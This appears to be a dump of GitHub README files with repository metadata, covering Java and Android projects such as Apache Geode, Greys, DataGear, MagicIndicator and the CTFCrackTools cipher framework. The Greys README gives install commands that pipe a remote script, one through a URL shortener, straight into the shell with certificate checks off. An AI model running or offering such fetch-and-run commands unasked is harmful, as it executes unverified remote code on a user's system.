* Data awareness and real-time business intelligence. If data changes as
you retrieve it, you see the changes immediately.
* Integration with Spring Framework to speed and simplify the development
of scalable, transactional enterprise applications.
* JTA compliant transaction support.
* Cluster-wide configurations that can be persisted and exported to other
clusters.
* Remote cluster management through HTTP.
* REST APIs for REST-enabled application development.
* Rolling upgrades may be possible, but they will be subject to any
limitations imposed by new features.
## Building this Release from Source
See [BUILDING.md](./BUILDING.md) for
instructions on how to build the project.
## Running Tests
See [TESTING.md](./TESTING.md) for
instructions on how to run tests.
## Geode in 5 minutes
Geode requires installation of JDK version 1.8. After installing Apache Geode,
start a locator and server:
```console
$ gfsh
gfsh> start locator
gfsh> start server
```
Create a region:
```console
gfsh> create region --name=hello --type=REPLICATE
```
Write a client application (this example uses a [Gradle](https://gradle.org)
build script):
_build.gradle_
```groovy
apply plugin: 'java'
apply plugin: 'application'
mainClassName = 'HelloWorld'
repositories { mavenCentral() }
dependencies {
compile 'org.apache.geode:geode-core:1.4.0'
runtime 'org.slf4j:slf4j-log4j12:1.7.24'
}
```
_src/main/java/HelloWorld.java_
```java
import java.util.Map;
import org.apache.geode.cache.Region;
import org.apache.geode.cache.client.*;
public class HelloWorld {
public static void main(String[] args) throws Exception {
ClientCache cache = new ClientCacheFactory()
.addPoolLocator(""localhost"", 10334)
.create();
Region region = cache
.createClientRegionFactory(ClientRegionShortcut.CACHING_PROXY)
.create(""hello"");
region.put(""1"", ""Hello"");
region.put(""2"", ""World"");
for (Map.Entry entry : region.entrySet()) {
System.out.format(""key = %s, value = %s\n"", entry.getKey(), entry.getValue());
}
cache.close();
}
}
```
Build and run the `HelloWorld` example:
```console
$ gradle run
```
The application will connect to the running cluster, create a local cache, put
some data in the cache, and print the cached data to the console:
```console
key = 1, value = Hello
key = 2, value = World
```
Finally, shutdown the Geode server and locator:
```console
gfsh> shutdown --include-locators=true
```
For more information see the [Geode
Examples](https://github.com/apache/geode-examples) repository or the
[documentation](https://geode.apache.org/docs/).
## Application Development
Apache Geode applications can be written in these client technologies:
* Java [client](https://geode.apache.org/docs/guide/18/topologies_and_comm/cs_configuration/chapter_overview.html)
or [peer](https://geode.apache.org/docs/guide/18/topologies_and_comm/p2p_configuration/chapter_overview.html)
* [REST](https://geode.apache.org/docs/guide/18/rest_apps/chapter_overview.html)
* [Memcached](https://cwiki.apache.org/confluence/display/GEODE/Moving+from+memcached+to+gemcached)
The following libraries are available external to the Apache Geode project:
* [Spring Data GemFire](https://projects.spring.io/spring-data-gemfire/)
* [Spring Cache](https://docs.spring.io/spring/docs/current/spring-framework-reference/html/cache.html)
* [Python](https://github.com/gemfire/py-gemfire-rest)
## Export Control
This distribution includes cryptographic software.
The country in which you currently reside may have restrictions
on the import, possession, use, and/or re-export to another country,
of encryption software. BEFORE using any encryption software,
please check your country's laws, regulations and policies
concerning the import, possession, or use, and re-export of
encryption software, to see if this is permitted.
See for more information.
The U.S. Government Department of Commerce, Bureau of Industry and Security (BIS),
has classified this software as Export Commodity Control Number (ECCN) 5D002.C.1,
which includes information security software using or performing
cryptographic functions with asymmetric algorithms.
The form and manner of this Apache Software Foundation distribution makes
it eligible for export under the License Exception
ENC Technology Software Unrestricted (TSU) exception
(see the BIS Export Administration Regulations, Section 740.13)
for both object code and source code.
The following provides more details on the included cryptographic software:
* Apache Geode is designed to be used with
[Java Secure Socket Extension](https://docs.oracle.com/javase/8/docs/technotes/guides/security/jsse/JSSERefGuide.html) (JSSE) and
[Java Cryptography Extension](https://docs.oracle.com/javase/8/docs/technotes/guides/security/crypto/CryptoSpec.html) (JCE).
The [JCE Unlimited Strength Jurisdiction Policy](https://www.oracle.com/technetwork/java/javase/downloads/jce8-download-2133166.html)
may need to be installed separately to use keystore passwords with 7 or more characters.
* Apache Geode links to and uses [OpenSSL](https://www.openssl.org/) ciphers.
"
rubensousa/GravitySnapHelper,master,4988,611,2016-08-31T07:25:23Z,83050,6,A SnapHelper that snaps a RecyclerView to an edge.,recyclerview snapping,"# GravitySnapHelper
A SnapHelper that snaps a RecyclerView to an edge.
## Setup
Add this to your build.gradle:
```groovy
implementation 'com.github.rubensousa:gravitysnaphelper:2.2.2'
```
## How to use
You can either create a GravitySnapHelper, or use GravitySnapRecyclerView.
If you want to use GravitySnapHelper directly,
you just need to create it and attach it to your RecyclerView:
```kotlin
val snapHelper = GravitySnapHelper(Gravity.START)
snapHelper.attachToRecyclerView(recyclerView)
```
If you want to use GravitySnapRecyclerView, you can use the following xml attributes for customisation:
```xml
```
Example:
```xml
```
## Start snapping
```kotlin
val snapHelper = GravitySnapHelper(Gravity.START)
snapHelper.attachToRecyclerView(recyclerView)
```
## Center snapping
```kotlin
val snapHelper = GravitySnapHelper(Gravity.CENTER)
snapHelper.attachToRecyclerView(recyclerView)
```
## Limiting fling distance
If you use **setMaxFlingSizeFraction** or **setMaxFlingDistance**
you can change the maximum fling distance allowed.
## With decoration
## Features
1. **setMaxFlingDistance** or **setMaxFlingSizeFraction** - changes the max fling distance allowed.
2. **setScrollMsPerInch** - changes the scroll speed.
3. **setGravity** - changes the gravity of the SnapHelper.
4. **setSnapToPadding** - enables snapping to padding (default is false)
5. **smoothScrollToPosition** and **scrollToPosition**
6. RTL support out of the box
## Nested RecyclerViews
Take a look at these blog posts if you're using nested RecyclerViews
1. [Improving scrolling behavior of nested RecyclerViews](https://rubensousa.com/2019/08/16/nested_recyclerview_part1/)
2. [Saving scroll state of nested RecyclerViews](https://rubensousa.com/2019/08/27/saving_scroll_state_of_nested_recyclerviews/)
## License
Copyright 2018 The Android Open Source Project
Copyright 2019 Rúben Sousa
Licensed under the Apache License, Version 2.0 (the ""License"");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an ""AS IS"" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"
oldmanpushcart/greys-anatomy,master,3997,1216,2012-11-21T19:39:35Z,1769,75,Java诊断工具,diagnosis greys jvmti troubleshooting,"![LOGO icon](https://raw.githubusercontent.com/oldmanpushcart/images/master/greys/greys-logo-readme.png)
>
线上系统为何经常出错?数据库为何屡遭黑手?业务调用为何频频失败?连环异常堆栈案,究竟是哪次调用所为?
数百台服务器意外雪崩背后又隐藏着什么?是软件的扭曲还是硬件的沦丧?
走进科学带你了解Greys, Java线上问题诊断工具。
# 相关文档
* [关于软件](https://github.com/oldmanpushcart/greys-anatomy/wiki/Home)
* [程序安装](https://github.com/oldmanpushcart/greys-anatomy/wiki/installing)
* [入门说明](https://github.com/oldmanpushcart/greys-anatomy/wiki/Getting-Started)
* [常见问题](https://github.com/oldmanpushcart/greys-anatomy/wiki/FAQ)
* [更新记事](https://github.com/oldmanpushcart/greys-anatomy/wiki/Chronicle)
* [详细文档](https://github.com/oldmanpushcart/greys-anatomy/wiki/greys-pdf)
* [English-README](https://github.com/oldmanpushcart/greys-anatomy/blob/master/Greys_en.md)
# 程序安装
- 远程安装
```shell
curl -sLk http://ompc.oss.aliyuncs.com/greys/install.sh|sh
```
- 远程安装(短链接)
```shell
curl -sLk http://t.cn/R2QbHFc|sh
```
## 最新版本
### **VERSION :** 1.7.6.6
1. 支持JDK9
2. greys.sh脚本支持tar的解压缩模式(有些机器没有unzip),默认unzip
3. 修复 #219 问题
### 版本号说明
`主版本`.`大版本`.`小版本`.`漏洞修复`
* 主版本
这个版本更新说明程序架构体系进行了重大升级,比如之前的0.1版升级到1.0版本,整个软件的架构从单机版升级到了SOCKET多机版。并将Greys的性质进行的确定:Java版的HouseMD,但要比前辈们更强。
* 大版本
程序的架构设计进行重大改造,但不影响用户对这款软件的定位。
* 小版本
增加新的命令和功能
* 漏洞修复
对现有版本进行漏洞修复和增强
- `主版本`、`大版本`、之间不做任何向下兼容的承诺,即`0.1`版本的Client不保证一定能正常访问`1.0`版本的Server。
- `小版本`不兼容的版本会在版本升级中指出
- `漏洞修复`保证向下兼容
# 维护者
* [李夏驰](http://www.weibo.com/vlinux)
* [姜小逸又胖了](http://weibo.com/chengtd)
# 程序编译
- 打开终端
```shell
git clone git@github.com:oldmanpushcart/greys-anatomy.git
cd greys-anatomy/bin
./greys-packages.sh
```
- 程序执行
在`target/`目录下生成对应版本的release文件,比如当前版本是`1.7.0.4`,则生成文件`target/greys-1.7.0.4-bin.zip`
程序在本地编译时会主动在本地安装当前编译的版本,所以编译完成后即相当在本地完成了安装。
# 写在后边
## 心路感悟
我编写和维护这款软件已经5年了,5年中Greys也从`0.1`版本一直重构到现在的`1.7`。在这个过程中我得到了许多人的帮助与建议,并在年底我计划发布`2.0`版本,将开放Greys的底层通讯协议,支持websocket访问。
多年的问题排查经验我没有过多的分享,一个Java程序员个中的苦闷也无从分享,一切我都融入到了这款软件的命令中,希望这些沉淀能帮助到可能需要到的你少走一些弯路,同时我也非常期待你们对她的反馈,这样我将感到非常开心和有成就感。
## 帮助我们
Greys的成长需要大家的帮助。
- **分享你使用Greys的经验**
我非常希望能得到大家的使用反馈和经验分享,如果你有,请将分享文章敏感信息脱敏之后邮件给我:[oldmanpushcart@gmail.com](mailto:oldmanpushcart@gmail.com),我将会分享给更多的同行。
- **帮助我完善代码或文档**
一款软件再好,也需要详细的帮助文档;一款软件再完善,也有很多坑要埋。今天我的精力非常有限,希望能得到大家共同的帮助。
- **如果你喜欢这款软件,欢迎打赏一杯咖啡**
嗯,说实话,我是指望用这招来买辆玛莎拉蒂...当然是个玩笑~你们的鼓励将会是我的动力,钱不在乎多少,重要的是我将能从中得到大家善意的反馈,这将会是我继续前进的动力。
![alipay](https://raw.githubusercontent.com/oldmanpushcart/images/master/alipay-vlinux.png)
## 联系我们
有问题阿里同事可以通过旺旺找到我,阿里外的同事可以通过[我的微博](http://weibo.com/vlinux)联系到我。今晚的杭州大雪纷飞,明天西湖应该非常的美丽,大家晚安。
菜鸟-杜琨(dukun@alibaba-inc.com)
"
opensourceBIM/BIMserver,master,1490,604,2013-05-08T14:55:01Z,630415,141,The open source BIMserver platform,bim bim-applications bim-bots bim-server bimserver buildingsmart ifc java openbim,"BIMserver
=========
The Building Information Model server (short: BIMserver) enables you to store and manage the information of a construction (or other building related) project. Data is stored in the open data standard IFC. The BIMserver is not a fileserver, but it uses a model-driven architecture approach. This means that IFC data is stored as objects. You could see BIMserver as an IFC database, with special extra features like model checking, versioning, project structures, merging, etc. The main advantage of this approach is the ability to query, merge and filter the BIM-model and generate IFC output (i.e. files) on the fly.
Thanks to its multi-user support, multiple people can work on their own part of the dataset, while the complete dataset is updated on the fly. Other users can get notifications when the model (or a part of it) is updated.
BIMserver is built for developers. We've got a great wiki on https://github.com/opensourceBIM/BIMserver/wiki and are very active supporting developers on https://github.com/opensourceBIM/BIMserver/issues
(C) Copyright by the contributers / BIMserver.org
Licence: GNU Affero General Public License, version 3 (see http://www.gnu.org/licenses/agpl-3.0.html)
Beware: this project makes intensive use of several other projects with different licenses. Some plugins and libraries are published under a different license.
"
patric-r/jvmtop,master,1214,249,2015-07-14T12:58:49Z,268,61,"Java monitoring for the command-line, profiler included",,"jvmtop is a lightweight console application to monitor all accessible, running jvms on a machine.
In a top-like manner, it displays JVM internal metrics (e.g. memory information) of running java processes.
It's tested with different releases of Oracle JDK, IBM JDK and OpenJDK on Linux, Solaris, FreeBSD and Windows hosts.
Jvmtop requires a JDK - a JRE will not suffice.
Please note that it's currently in an alpha state -
if you experience an issue or need further help, please let us know.
Jvmtop is open-source. Checkout the source code. Patches are very welcome!
Also have a look at the documentation or at a captured live-example.
```
JvmTop 0.8.0 alpha amd64 8 cpus, Linux 2.6.32-27, load avg 0.12
https://github.com/patric-r/jvmtop
PID MAIN-CLASS HPCUR HPMAX NHCUR NHMAX CPU GC VM USERNAME #T DL
3370 rapperSimpleApp 165m 455m 109m 176m 0.12% 0.00% S6U37 web 21
11272 ver.resin.Resin [ERROR: Could not attach to VM]
27338 WatchdogManager 11m 28m 23m 130m 0.00% 0.00% S6U37 web 31
19187 m.jvmtop.JvmTop 20m 3544m 13m 130m 0.93% 0.47% S6U37 web 20
16733 artup.Bootstrap 159m 455m 166m 304m 0.12% 0.00% S6U37 web 46
```
Installation
Click on the releases tab, download the
most recent tar.gz archive. Extract it, ensure that the `JAVA_HOME` environment variable points to a valid JDK and run `./jvmtop.sh`.
Further information can be found in the [INSTALL file](https://github.com/patric-r/jvmtop/blob/master/INSTALL)
08/14/2013 jvmtop 0.8.0 released
Changes:
improved attach compatibility for all IBM jvms
fixed wrong CPU/GC values for IBM J9 jvms
in case of unsupported heap size metric retrieval, n/a will be displayed instead of 0m
improved argument parsing, support for short-options, added help (pass --help), see issue #28 (now using the great jopt-simple library)
when passing the --once option, terminal will not be cleared anymore (see issue #27)
improved shell script for guessing the path if a JAVA_HOME environment variable is not present (thanks to Markus Kolb)
# 简介
DataGear是一款开源免费的数据可视化分析平台,自由制作任何您想要的数据看板,支持接入SQL、CSV、Excel、HTTP接口、JSON等多种数据源。
## [DataGear 4.7.0 已发布,欢迎官网下载使用!](http://www.datagear.tech)
## [DataGear专业版 1.0.0 正式发布,欢迎试用!](http://www.datagear.tech/pro/)
# 特点
- 友好接入的数据源
支持运行时接入任意提供JDBC驱动的数据库,包括MySQL、Oracle、PostgreSQL、SQL Server等关系数据库,以及Elasticsearch、ClickHouse、Hive等大数据引擎
- 多样动态的数据集
支持创建SQL、CSV、Excel、HTTP接口、JSON数据集,并可设置为动态的参数化数据集,可定义文本框、下拉框、日期框、时间框等类型的数据集参数,灵活筛选满足不同业务需求的数据
- 强大丰富的数据图表
数据图表可聚合绑定多个不同格式的数据集,轻松定义同比、环比图表,内置折线图、柱状图、饼图、地图、雷达图、漏斗图、散点图、K线图、桑基图等70+开箱即用的图表,并且支持自定义图表配置项,支持编写和上传自定义图表插件
- 自由开放的数据看板
数据看板采用原生的HTML网页作为模板,支持导入任意HTML网页,支持以可视化方式进行看板设计和编辑,也支持使用JavaScript、CSS等web前端技术自由编辑看板源码,内置丰富的API,可制作图表联动、数据钻取、异步加载、交互表单等个性化的数据看板。
# 功能
![screenshot/architecture.png](screenshot/architecture.png)
# 官网
[http://www.datagear.tech](http://www.datagear.tech)
# 界面
数据源管理
![screenshot/datasource-manage.png](screenshot/datasource-manage.png)
SQL数据集
![screenshot/add-sql-dataset.png](screenshot/add-sql-dataset.png)
看板编辑
![screenshot/dashboard-visual-mode.gif](screenshot/dashboard-visual-mode.gif)
看板展示
![screenshot/template-006-dg.png](screenshot/template-006-dg.png)
看板展示-图表联动
![screenshot/dashboard-map-chart-link.gif](screenshot/dashboard-map-chart-link.gif)
看板展示-实时图表
![screenshot/dashboard-time-series-chart.gif](screenshot/dashboard-time-series-chart.gif)
看板展示-钻取
![screenshot/dashboard-map-chart-hierarchy.gif](screenshot/dashboard-map-chart-hierarchy.gif)
看板展示-表单
![screenshot/dashboard-form.gif](screenshot/dashboard-form.gif)
看板展示-联动异步加载图表
![screenshot/dashboard-link-load-chart.gif](screenshot/dashboard-link-load-chart.gif)
# 技术栈(前后端一体)
- 后端
Spring Boot、Mybatis、Freemarker、Derby、Jackson、Caffeine、Spring Security
- 前端
jQuery、Vue3、PrimeVue、CodeMirror、ECharts、DataTables
# 模块介绍
- datagear-analysis
数据分析底层模块,定义数据集、图表、看板API
- datagear-connection
数据库连接支持模块,定义可从指定目录加载JDBC驱动、新建连接的API
- datagear-dataexchange
数据导入/导出底层模块,定义导入/导出指定数据源数据的API
- datagear-management
系统业务服务模块,定义数据源、数据分析等功能的服务层API
- datagear-meta
数据源元信息底层模块,定义解析指定数据源表结构的API
- datagear-persistence
数据源数据管理底层模块,定义读取、编辑、查询数据源表数据的API
- datagear-util
系统常用工具集模块
- datagear-web
系统web模块,定义web控制器、操作页面
- datagear-webapp
系统web应用模块,定义程序启动类
# 依赖
Java 8+
Servlet 3.1+
# 编译
## 准备单元测试环境
1. 安装`MySQL-8.0`数据库,并将`root`用户的密码设置为:`root`(或者修改`test/config/jdbc.properties`配置)
2. 新建测试数据库,名称取为:`dg_test`
3. 使用`test/sql/test-mysql.sql`脚本初始化`dg_test`库
## 执行编译命令
mvn clean package
或者,也可不准备单元测试环境,直接执行如下编译命令:
mvn clean package -DskipTests
编译完成后,将在`datagear-webapp/target/datagear-[version]-packages/`内生成程序包。
# 调试
1. 将`datagear`以maven工程导入至IDE工具
2. 以调试模式运行`datagear-webapp`模块的启动类`org.datagear.webapp.DataGearApplication`
3. 打开浏览器,输入:`http://localhost:50401`
## 调试注意
在调试开发分支前(`dev-*`),建议先备份DataGear工作目录(`[用户主目录]/.datagear`),
因为开发分支程序启动时会修改DataGear工作目录,可能会导致先前使用的正式版程序、以及后续发布的正式版程序无法正常启动。
系统启动时会根据当前版本号自动升级内置数据库(Derby数据库,位于`[用户主目录]/.datagear/derby`目录下),且成功后下次启动时不再自动执行,如果调试时遇到数据库异常,需要查看
datagear-management/src/main/resources/org/datagear/management/ddl/datagear.sql
文件,从中查找需要更新的SQL语句,手动执行。
然后,手动执行下面更新系统版本号的SQL语句:
UPDATE DATAGEAR_VERSION SET VERSION_VALUE='当前版本号'
例如,对于`4.6.0`版本,应执行:
UPDATE DATAGEAR_VERSION SET VERSION_VALUE='4.6.0'
系统自带了一个可用于为内置数据库执行SQL语句的简单工具类`org.datagear.web.util.DerbySqlClient`,可以在IDE中直接运行。注意:运行前需要先停止DataGear程序。
# 版权和许可
Copyright 2018-2023 datagear.tech
DataGear is free software: you can redistribute it and/or modify it under the terms of
the GNU Lesser General Public License as published by the Free Software Foundation,
either version 3 of the License, or (at your option) any later version.
DataGear is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License along with DataGear.
If not, see .
"
aaberg/sql2o,master,1131,231,2011-05-18T21:13:57Z,1785,77,"sql2o is a small library, which makes it easy to convert the result of your sql-statements into objects. No resultset hacking required. Kind of like an orm, but without the sql-generation capabilities. Supports named parameters.",,"# sql2o [![Github Actions Build](https://github.com/aaberg/sql2o/actions/workflows/pipeline.yml/badge.svg)](https://github.com/aaberg/sql2o/actions) [![Maven Central](https://img.shields.io/maven-central/v/org.sql2o/sql2o.svg)](https://search.maven.org/search?q=g:org.sql2o%20a:sql2o)
Sql2o is a small java library, with the purpose of making database interaction easy.
When fetching data from the database, the ResultSet will automatically be filled into your POJO objects.
Kind of like an ORM, but without the SQL generation capabilities.
Sql2o requires at Java 7 or 8 to run. Java versions past 8 may work, but is currently not supported.
# Announcements
*2024-03-12* | [Sql2o 1.7.0 was released](https://github.com/aaberg/sql2o/discussions/365)
# Examples
Check out the [sql2o website](http://www.sql2o.org) for examples.
# Coding guidelines.
When hacking sql2o, please follow [these coding guidelines](https://github.com/aaberg/sql2o/wiki/Coding-guidelines).
"
hackware1993/MagicIndicator,main,9653,1540,2016-06-26T08:20:43Z,54746,185,"A powerful, customizable and extensible ViewPager indicator framework. As the best alternative of ViewPagerIndicator, TabLayout and PagerSlidingTabStrip —— 强大、可定制、易扩展的 ViewPager 指示器框架。是ViewPagerIndicator、TabLayout、PagerSlidingTabStrip的最佳替代品。支持角标,更支持在非ViewPager场景下使用(使用hide()、show()切换Fragment或使用setVisibility切换FrameLayout里的View等),http://www.jianshu.com/p/f3022211821c",indicator pagerslidingtabstrip tablayout viewpager viewpagerindicator,"# MagicIndicator
A powerful, customizable and extensible ViewPager indicator framework. As the best alternative of ViewPagerIndicator, TabLayout and PagerSlidingTabStrip.
[Flutter_ConstraintLayout](https://github.com/hackware1993/Flutter_ConstraintLayout) Another very good open source project of mine.
**I have developed the world's fastest general purpose sorting algorithm, which is on average 3 times faster than Quicksort and up to 20 times faster**, [ChenSort](https://github.com/hackware1993/ChenSort)
[![](https://jitpack.io/v/hackware1993/MagicIndicator.svg)](https://jitpack.io/#hackware1993/MagicIndicator)
[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-MagicIndicator-green.svg?style=true)](https://android-arsenal.com/details/1/4252)
[![Codewake](https://www.codewake.com/badges/ask_question.svg)](https://www.codewake.com/p/magicindicator)
![magicindicaotor.gif](https://github.com/hackware1993/MagicIndicator/blob/main/magicindicator.gif)
# Usage
Simple steps, you can integrate **MagicIndicator**:
1. checkout out **MagicIndicator**, which contains source code and demo
2. import module **magicindicator** and add dependency:
```groovy
implementation project(':magicindicator')
```
**or**
```groovy
repositories {
...
maven {
url ""https://jitpack.io""
}
}
dependencies {
...
implementation 'com.github.hackware1993:MagicIndicator:1.6.0' // for support lib
implementation 'com.github.hackware1993:MagicIndicator:1.7.0' // for androidx
}
```
3. add **MagicIndicator** to your layout xml:
```xml
```
4. find **MagicIndicator** through code, initialize it:
```java
MagicIndicator magicIndicator = (MagicIndicator) findViewById(R.id.magic_indicator);
CommonNavigator commonNavigator = new CommonNavigator(this);
commonNavigator.setAdapter(new CommonNavigatorAdapter() {
@Override
public int getCount() {
return mTitleDataList == null ? 0 : mTitleDataList.size();
}
@Override
public IPagerTitleView getTitleView(Context context, final int index) {
ColorTransitionPagerTitleView colorTransitionPagerTitleView = new ColorTransitionPagerTitleView(context);
colorTransitionPagerTitleView.setNormalColor(Color.GRAY);
colorTransitionPagerTitleView.setSelectedColor(Color.BLACK);
colorTransitionPagerTitleView.setText(mTitleDataList.get(index));
colorTransitionPagerTitleView.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
mViewPager.setCurrentItem(index);
}
});
return colorTransitionPagerTitleView;
}
@Override
public IPagerIndicator getIndicator(Context context) {
LinePagerIndicator indicator = new LinePagerIndicator(context);
indicator.setMode(LinePagerIndicator.MODE_WRAP_CONTENT);
return indicator;
}
});
magicIndicator.setNavigator(commonNavigator);
```
5. work with ViewPager:
```java
ViewPagerHelper.bind(magicIndicator, mViewPager);
```
**or**
work with Fragment Container(switch Fragment by hide()、show()):
```java
mFramentContainerHelper = new FragmentContainerHelper(magicIndicator);
// ...
mFragmentContainerHelper.handlePageSelected(pageIndex); // invoke when switch Fragment
```
# Extend
**MagicIndicator** can be easily extended:
1. implement **IPagerTitleView** to customize tab:
```java
public class MyPagerTitleView extends View implements IPagerTitleView {
public MyPagerTitleView(Context context) {
super(context);
}
@Override
public void onLeave(int index, int totalCount, float leavePercent, boolean leftToRight) {
}
@Override
public void onEnter(int index, int totalCount, float enterPercent, boolean leftToRight) {
}
@Override
public void onSelected(int index, int totalCount) {
}
@Override
public void onDeselected(int index, int totalCount) {
}
}
```
2. implement **IPagerIndicator** to customize indicator:
```java
public class MyPagerIndicator extends View implements IPagerIndicator {
public MyPagerIndicator(Context context) {
super(context);
}
@Override
public void onPageSelected(int position) {
}
@Override
public void onPageScrolled(int position, float positionOffset, int positionOffsetPixels) {
}
@Override
public void onPageScrollStateChanged(int state) {
}
@Override
public void onPositionDataProvide(List dataList) {
}
}
```
3. use **CommonPagerTitleView** to load custom layout xml.
Now, enjoy yourself!
See extensions in [*app/src/main/java/net/lucode/hackware/magicindicatordemo/ext*](https://github.com/hackware1993/MagicIndicator/tree/master/app/src/main/java/net/lucode/hackware/magicindicatordemo/ext),more extensions adding...
# Who developed?
hackware1993@gmail.com
cfb1993@163.com
Q&A
An intermittent perfectionist.
Visit [My Blog](http://hackware.lucode.net) for more articles about MagicIndicator.
订阅我的微信公众号以及时获取 MagicIndicator 的最新动态。后续也会分享一些高质量的、独特的、有思想的 Flutter 和 Android 技术文章。
![official_account.webp](https://github.com/hackware1993/weiV/blob/master/official_account.webp?raw=true)
# License
```
MIT License
Copyright (c) 2016 hackware1993
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the ""Software""), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
```
# More
Have seen here, give a star?(都看到这儿了,何不给个...,哎,别走啊,star还没...)
"
0Chencc/CTFCrackTools,master,1774,297,2016-08-26T08:19:35Z,161782,3,"China's first CTFTools framework.中国国内首个CTF工具框架,旨在帮助CTFer快速攻克难关",ctf ctf-tools framework java jython kotlin-java python websecurity,"# CTFcrackTools-V4.0
[![Build Status](https://travis-ci.org/0Chencc/CTFCrackTools.svg?branch=master)](https://travis-ci.org/0Chencc/CTFCrackTools)
[![](https://img.shields.io/github/v/release/0chencc/ctfcracktools?label=LATEST%20VERSION)](https://github.com/0Chencc/CTFCrackTools/releases/latest)
[![License: GPL v3](https://img.shields.io/badge/License-GPL%20v3-blue.svg)](https://raw.githubusercontent.com/0Chencc/CTFCrackTools/master/doc/LICENSE)
[![download](https://img.shields.io/github/downloads/0chencc/ctfcracktools/total)](https://github.com/0Chencc/CTFCrackTools/releases)
[![language](https://img.shields.io/badge/Language-Java/Kotlin-orange.svg)](https://github.com/0Chencc/CTFCrackTools/)
作者:林晨(0chen)
米斯特安全官网:http://www.acmesec.cn/
本工具已经可以作为burp插件导入,仓库地址:[DaE](https://github.com/0Chencc/DaE)
[请我喝一杯咖啡☕️](#要饭环节)
## 疑难解答
跳转到:[https://github.com/0Chencc/CTFCrackTools/wiki/FAQ](https://github.com/0Chencc/CTFCrackTools/wiki/FAQ)
## 界面介绍
主页面
![mark](img/use.gif)
添加插件
![mark](img/plugin.gif)
## 框架介绍
使用kotlin与java混合开发
这大概是国内首个应用于CTF的工具框架。
可以被应用于CTF中的Crypto,Misc...
内置目前主流密码(包括但不限于维吉利亚密码,凯撒密码,栅栏密码······)
用户可自主编写插件,但仅支持Python编写插件。编写方法也极为简单。(由于Jython自身的原因,暂时无法支持Python3)
在导入插件的时候一定要记得确认jython文件已经加载。
我们附带了一些插件在[现成插件](https://github.com/0Chencc/CTFCrackTools/tree/master/%E7%8E%B0%E6%88%90%E6%8F%92%E4%BB%B6)可供用户的使用
该项目一直在增强,这一次的重置只保留了部分核心代码,而将UI及优化代码重构,使这个框架支持更多功能。
项目地址:[https://github.com/0Chencc/CTFCrackTools](https://github.com/0Chencc/CTFCrackTools)
下载编译好的版本:[releases](https://github.com/0Chencc/CTFCrackTools/releases/)
## 插件编写
![plugin](img/plugin.gif)
```Python
#-*- coding:utf-8 -*-
#一个函数调用的demo
def main(input,a):
return 'input is %s,key is %s'%(input,a)
#我们希望能将插件开发者的信息存入程序中,所以需要定义author_info来进行开发者信息的注册
def author_info():
info = {
""author"":""0chen"",
""name"":""test_version"",
""key"":[""a""],
""describe"":""plugin describe""
}
return info
```
现在来具体讲下这些插件的用法,具体应该将下框架的调用方法。
**函数:** main
**描述:** 这个是程序调用插件时调用的函数。
定义:
```python
def main(input):
return 'succ'
```
**函数:** author_info
**描述:** 我们希望能将插件开发者的信息存入程序中,所以需要定义author_info来进行开发者信息的注册
**author:** 作者信息
**name:** 插件名称
**key:** 考虑到会有某些特定的密码需要key,有时候需要多个key。所以可以注册key的信息,当程序调用的时候会进行弹框。
**describe:** 这个地方是插件的描述。由于python2的原因,似乎对中文的支持不是很全,建议大家使用英文来进行描述。
定义:
```python
def author_info():
info = {
""author"":""0chen"",
""name"":""test_version"",
""key"":[""a""],
""describe"":""plugin describe""
}
return info
```
**因为工具调用其实就是通过def mian(input)传入数据然后获取return的数据。**
```Python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
def vigenereDecrypto(ciphertext,key):
ascii='ABCDEFGHIJKLMNOPQRSTUVWXYZ'
keylen=len(key)
ctlen=len(ciphertext)
plaintext = ''
i = 0
while i < ctlen:
j = i % keylen
k = ascii.index(key[j])
m = ascii.index(ciphertext[i])
if m < k:
m += 26
plaintext += ascii[m-k]
i += 1
return plaintext
def author_info:
info = {
'name':'VigenereDecrypto',
'author':'naiquan',
'key':'key',
'describe':'VigenereDecrypto'
}
def main(input,key):
return vigenereDecrypto(input.replace("" "","""").upper(),key.replace("" "","""").upper())
```
多参数调用demo(注册传入函数只需要以string数组的形式注册即可,如demo所示)
```python
#-*- coding:utf-8 -*-
#多参数调用的demo
#abd分别为需要传入参数,基本上没有参数限制(没测过)
def main(input,a,b,c):
return 'input is %s,key a is %s,key b is %s,key c is %s'%(input,a,b,c)
#我们希望能将插件开发者的信息存入程序中,所以需要定义author_info来进行开发者信息的注册
def author_info():
info = {
""author"":""0chen"",
""name"":""test_version"",
""key"":[""a"",""b"",""c""],
""describe"":""plugin describe""
}
return info
```
## 作者的碎碎念
作为一款自从2016年发布至今的工具,由于发布的时候,彼时作者在读高中,没有时间也没有能力去更新这样一款受众颇多的工具,这款工具到至今我收到了许多ctf初学者的感谢,因为近两年一直忙于生计,很难有时间去顾及到这款工具的发展,但是仍然会有许多朋友来联系我的qq和微信,对这款工具的发展提出宝贵的意见,这也是我时不时更新的动力。
我发现国内很多厂商都将这款工具作为ctf必备的工具加入到工具包中,非常感谢这些朋友的抬爱,也因为他们我的工具才能有上万人在使用。ctf圈子的氛围日益增长,希望这款工具也能跟随大家一直使用下去。
